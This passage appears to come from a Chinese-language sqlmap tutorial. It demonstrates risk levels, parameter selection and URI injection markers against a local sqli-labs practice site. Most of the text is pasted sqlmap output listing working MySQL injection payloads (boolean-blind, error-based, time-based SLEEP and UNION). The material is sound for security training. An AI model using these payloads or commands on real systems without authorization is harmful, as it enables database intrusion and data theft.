Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[18:29:08] [DEBUG] declared web page charset 'utf-8'
[18:29:08] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:29:08 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1--banner
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:29:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[18:29:08] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:29:08 /2020-02-29/
2.sqlmap设置风险等级
参数:
--risk
此参数用于指定风险等级,有1~3共3级;
默认风险等级为1,此等级在大多数情况下对测试目标无害;
风险等级2添加了基于时间的注入测试,等级3添加了OR测试。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1--banner --risk 2 -v 5
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:33:59 /2020-02-29/
[18:33:59] [DEBUG] cleaning up configuration parameters
[18:34:00] [DEBUG] setting the HTTP timeout
[18:34:00] [DEBUG] setting the HTTP User-Agent header
[18:34:00] [DEBUG] creating HTTP requests opener object
[18:34:00] [INFO] resuming back-end DBMS 'mysql'
[18:34:00] [INFO] testing connection to the target URL
[18:34:00] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[18:34:00] [DEBUG] declared web page charset 'utf-8'
[18:34:00] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:34:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x7178
7a6271),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:34:00] [INFO] the back-end DBMS is MySQL
[18:34:00] [INFO] fetching banner
[18:34:00] [DEBUG] resuming configuration option 'string' ('Your')
[18:34:00] [DEBUG] resuming configuration option 'optimize' (True)
[18:34:00] [DEBUG] turning off switch '--null-connection' used indirectly by switch '-o'
[18:34:00] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:34:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:34:00 /2020-02-29/
风险等级设为3时,同时注入点是update时,才会修改数据库中的数据。
三、sqlmap指定位置注入
1.sqlmap设置指定注入参数
默认情况下Sqlmap会测试所有GET参数和POST参数,当level大于等于2时会测试cookie参数, 当level大于等于3时会测试User-Agent和Referer。
实际上还可以手动指定一个以逗号分隔的、 要测试的参数列表,该列表中的参数不受level限制,这就是-p的作用。
如果不想测试某一参数则可以使用--skip。
-p参数测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,user-agent" --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:46:17 /2020-02-29/
[19:46:17] [INFO] testing connection to the target URL
[19:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:46:17] [INFO] testing if the target URL content is stable
[19:46:17] [INFO] target URL content is stable
[19:46:18] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:46:18] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:46:18] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:46:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:20] [WARNING] reflective value(s) found and filtering out
[19:46:20] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:46:20] [INFO] testing 'Generic inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:46:20] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:46:20] [INFO] testing 'MySQL inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:46:20] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:46:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:46:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:46:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:46:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:46:31] [INFO] target URL appears to have 3 columns in query
[19:46:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3986=3986 AND 'enRu'='enRu
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(1856=1856,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lead'='lead
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))pAXX) AND 'hFkU'='hFkU
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7916' UNION ALL SELECT NULL,CONCAT(0x716a6b7871,0x5555746d5964564d754675746c4543626c4f556c4f79716874665470654872514878594c714b4b42,0x7176627171),NULL-- -
---
[19:46:36] [INFO] the back-end DBMS is MySQL
[19:46:36] [INFO] fetching banner
[19:46:37] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:46:37] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 19:46:37 /2020-02-29/
增加参数再测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1&us=1&uname=admin -p "id,uname" --banner
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:07:41 /2020-02-29/
[20:07:42] [INFO] testing connection to the target URL
[20:07:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:07:42] [INFO] testing if the target URL content is stable
[20:07:42] [INFO] target URL content is stable
[20:07:42] [INFO] testing if GET parameter 'id' is dynamic
[20:07:42] [INFO] GET parameter 'id' appears to be dynamic
[20:07:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:07:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:07:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:07:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:45] [WARNING] reflective value(s) found and filtering out
[20:07:45] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:07:45] [INFO] testing 'Generic inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:07:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:07:45] [INFO] testing 'MySQL inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:07:45] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:07:55] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:07:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:07:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:07:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:07:55] [INFO] target URL appears to have 3 columns in query
[20:07:56] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2973=2973 AND 'kWQV'='kWQV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4270 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4270=4270,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rvTB'='rvTB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9758 FROM (SELECT(SLEEP(5)))Vtem) AND 'vzvR'='vzvR
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4491' UNION ALL SELECT NULL,NULL,CONCAT(0x716a766271,0x7353566b685a767a4a68677574726d7662637477586e445172546473554f5872507a616670787677,0x716a6a6b71)-- -
---
[20:08:00] [INFO] the back-end DBMS is MySQL
[20:08:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:08:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:08:00 /2020-02-29/
'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.
–skip参数测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,uname" --flush-session --banner
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:14:15 /2020-02-29/
[20:14:16] [INFO] testing connection to the target URL
[20:14:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:14:16] [INFO] testing if the target URL content is stable
[20:14:16] [INFO] target URL content is stable
[20:14:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:14:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:14:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:21] [WARNING] reflective value(s) found and filtering out
[20:14:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:14:21] [INFO] testing 'Generic inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:14:21] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:14:21] [INFO] testing 'MySQL inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:14:21] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:14:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:14:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:14:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:14:32] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:14:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:14:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:14:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:14:32] [INFO] target URL appears to have 3 columns in query
[20:14:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7433=7433 AND 'hrGB'='hrGB
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8471 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8471=8471,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ygzr'='Ygzr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6957 FROM (SELECT(SLEEP(5)))YTQj) AND 'ogBe'='ogBe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5025' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7171,0x586f6f6965736173736f49534a4243526a6c4c625a59534d484c6d74426d6d414b7551676b734c56,0x716a766271)-- -
---
[20:14:36] [INFO] the back-end DBMS is MySQL
[20:14:36] [INFO] fetching banner
[20:14:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:14:36] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:14:36 /2020-02-29/
2.sqlmap设置URI注入位置
当注入点位于URI本身内部时,会出现一些特殊情况,除非手动指向URI路径,否则sqlmap不会对URI路径执行任何自动测试,必须在命令行中添加 星号(*) 来指定这些注入点。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1&uname=admin --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:31:12 /2020-02-29/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[20:31:14] [INFO] testing connection to the target URL
[20:31:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:31:14] [INFO] testing if the target URL content is stable
[20:31:15] [INFO] target URL content is stable
[20:31:15] [INFO] testing if URI parameter '#1*' is dynamic
[20:31:15] [INFO] URI parameter '#1*' appears to be dynamic
[20:31:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:31:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:31:15] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:31:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:17] [WARNING] reflective value(s) found and filtering out
[20:31:17] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:31:17] [INFO] testing 'Generic inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:17] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:31:17] [INFO] testing 'MySQL inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:17] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:27] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:31:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:31:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:31:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:31:27] [INFO] target URL appears to have 3 columns in query
[20:31:28] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 9722=9722 AND 'aMLa'='aMLa
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4986 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4986=4986,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ocPA'='ocPA
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))FboN) AND 'hyuA'='hyuA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-5390' UNION ALL SELECT NULL,CONCAT(0x716b787171,0x43554e745571626a51707163415541545a6246417749666442464676727449686b734f566966626b,0x7171767a71),NULL-- -
---
[20:31:33] [INFO] the back-end DBMS is MySQL
[20:31:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:31:34] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:31:34 /2020-02-29/
'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.
增加参数标注再次测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1*&uname=admin --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:33:23 /2020-02-29/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[20:33:26] [INFO] testing connection to the target URL
[20:33:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:26] [INFO] testing if the target URL content is stable
[20:33:26] [INFO] target URL content is stable
